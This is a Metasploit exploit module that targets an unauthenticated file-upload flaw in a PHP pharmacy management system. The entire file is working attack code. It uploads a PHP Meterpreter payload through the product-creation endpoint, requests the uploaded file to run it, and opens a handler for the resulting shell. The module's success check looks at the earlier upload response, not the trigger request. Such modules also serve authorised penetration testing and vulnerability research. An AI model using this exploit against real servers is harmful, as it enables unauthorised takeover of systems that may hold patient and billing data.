##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# Vendor: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download
# Source: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Multi Language Pharmacy Management System Unauthenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits the file upload vulnerability of Multi Language Pharmacy Management System and allows remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Emirhan Kurt <emirhan@prodaft.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP],
      'Targets'        =>
        [
          ['PHP payload',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The TARGET URI of the Pharmacy Management', '/'])
      ]
    )
  end

  def exploit

    print_status('Uploading shell...')

    fname = rand_text_alphanumeric(rand(10) + 6) + '.php'

    boundary = "---------------------------#{rand_text_numeric(29)}"
    data_post = "--#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"currnt_date\""
    data_post << "\r\n\r\n"
    data_post << "\r\n"
    data_post << "--#{boundary}\r\n"
    data_post << "Content-Disposition: form-data; name=\"Medicine\"; filename=\"#{fname}\"\r\n"
    data_post << "Content-Type: application/x-php\r\n"
    data_post << "\r\n#{payload.encoded}\r\n"
    data_post << "--#{boundary}\r\n"

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path,'php_action/createProduct.php'),
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'data' => data_post,
    })

    if res && res.code == 302 && res.body.include?('Image uploaded successfully')
      print_good("Shell uploaded as #{fname}")
    else
      print_error("Server responded with code #{res.code}")
      print_error("Failed to upload shell")
      return false
    end

    print_status('Executing payload...')
    send_request_cgi({
      'uri'    => normalize_uri(target_uri.path,'assets/myimages/'+fname),
      'method' => 'GET'
    }, 5)

    if res
      print_good("Payload successfully triggered !")
    else
      print_error("Server responded with code #{res.code}")
      print_error("Failed to upload shell")
      return false
    end

    handler

  end
end